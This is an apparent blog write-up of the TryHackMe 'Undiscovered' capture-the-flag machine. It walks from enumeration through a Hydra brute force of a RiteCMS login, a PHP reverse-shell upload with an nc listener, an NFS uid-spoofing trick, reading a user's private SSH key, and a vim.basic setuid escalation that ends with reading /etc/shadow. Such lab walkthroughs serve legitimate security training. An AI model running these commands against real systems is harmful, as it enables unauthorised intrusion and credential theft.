Undiscovered — TryHackMe — WriteUp

TonyRahmos
6 min readDec 1, 2020

--

Hello. I’m Rahmos. Here is my Undiscovered — TryHackMe — WriteUp. Check it out!

First, add undiscovered.thm to your /etc/hosts. Then, deploy the machine and nmap for opened ports:

nmap -A -T4 -p- -v <ip>

nmap
nmap
nmap

So there are 5 ports opened: 22(SSH), 80(HTTP), 111(RPC), 2049(NFS), and 41693(nlockmgr).

Let’s first access the website at port 80:

website

I’ve checked the page source but nothing valuable. So let’s move to finding hidden dirs using gobuster:

gobuster dir -u http://undiscovered.thm -w /path-to-wordlist

However, I’ve found nothing.

gobuster

I’ve also tried to list mountable folder using showmount, but still not worked.

showmout -e

So next, I will find the web’s subdomains using wfuzz:

wfuzz -c -f undiscovered.txt -w /path-to-wordlist -u “http://undiscovered.thm/” -H “Host:FUZZ.undiscovered.thm” — hw 290 — hc 404,302

I will use the “SecLists” wordlist, you can find it here.

After wfuzz finished, cat undiscovered.txt to see the result:

undiscovered.txt

Well I’ve found many subdomains here! Let’s add one of them to /etc/hosts and access it. I will choose “manager”.

manager.undiscovered.thm

So it’s using RiteCMS version 2.2.1. Look for exploit and I found this link.

So what I need to find now is the /cms page to login. However, subdomain “manager” doesn’t have this /cms page. So I wrote a simple script by Python to visit /cms at all the subdomains I found above, and “deliver” is the right one.

manager doesn’t have /cms
deliver is the right subdomain

According to the link, the default username : password is admin : admin. So let’s try to login.

admin : admin

However, I can’t use this default credential login. So I’ll bruteforce the password using Hydra:

hydra -l admin -P rockyou.txt deliver.undiscovered.thm http-post-form “/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong”

After a while, I’ve got the password.

correct password

Let’s login:

admin panel

Navigate to File Manager →Upload. Upload the php-reverse-shell.

upload shell

Now the shell has been uploaded. Start a listener:

nc -lvnp 4444

Access “deliver.undiscovered.thm/media/php-reverse-shell.php” to activate it.

shell

I’ve got the shell into the machine. Spawn a tty shell using Python:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

export TERM=xterm

There are 2 users in /home, however, I cannot access inside both folders now due to permission.

/home

So I’ll find another way to get their credentials. Because there’s a website, so let’s access /var/www to see if there is any configuration files.

/var/www

All subdomains of the website are there. Because I’ve known “deliver” is the right subdomain, so let’s access its folder.

There’re 2 hidden folders: data and files. There’s nothing inside files:

So let’s enum more inside data. However, there’s only the admin’s password is in there, which I’ve known before.

userdata

Let’s find another way. Look back at nmap, there’re NFS share folders, but I cannot access. But now I’ve got the shell into the machine, so I can see which folders are shared by cat /etc/exports:

/etc/exports

So folder /home/william is shared and can be accessed. Let’s see his uid and gid:

It’s 3003. Create a user “william” on your machine with the same uid and gid, and mount the folder to see what’s inside.

useradd -u 3003 william

Ok so “william” has been created. Mount his homefolder:

mount -t nfs <ip>:/home/william /home/william

Change william’s shell to /bin/bash:

usermod — shell /bin/bash william

Then su william and access /home/willam:

/home/william

Get the 1st flag:

user.txt

Now I’ll find a way to own root and get the final flag. First, change the permission of /home/william to 777, so I can access it from the target machine as www-data.

chmod 777 /home/william

There’re 2 suspicious files inside william’s home folder: admin.sh and script.

admin.sh

Use ghidra to decompile script:

script

Ok so if I execute script without argument, it will exec admin.sh. But if I provide with argument, I can read this argument(strcat) as leonard priv.

Go back to the reverse shell at target machine. Let’s try exec script:

without argument
with argument

Let’s see if leonard has the private ssh key:

./script /.ssh/id_rsa

id_rsa

Ah yes! Now I’ve got the private SSH key of leonard! Create a txt file with the content of this private key, chmod 600 this file and ssh to the machine as leonard!

ssh as leonard

And because leonard’s private key has no password, I’m in!

Let’s check Capabilities:

getcap -r / 2>/dev/null

getcap

Well so vim.basic has the cap of setuid. Reference to gtfobins, exec this command to get root shell:

gtfobins

/usr/bin/vim.basic -c ‘:py import os; os.setuid(0); os.execl(“/bin/sh”, “sh”, “-c”, “reset; exec sh”)’

Oh wait, it’s not working! Let’s try again with py3(python3):

/usr/bin/vim.basic -c ‘:py3 import os; os.setuid(0); os.execl(“/bin/sh”, “sh”, “-c”, “reset; exec sh”)’

root shell

Now I’m root! Get root’s password’s hash in /etc/shadow, it will be the final flag.

root’s password’s hash

The end.

HAPPY HACKING

--

--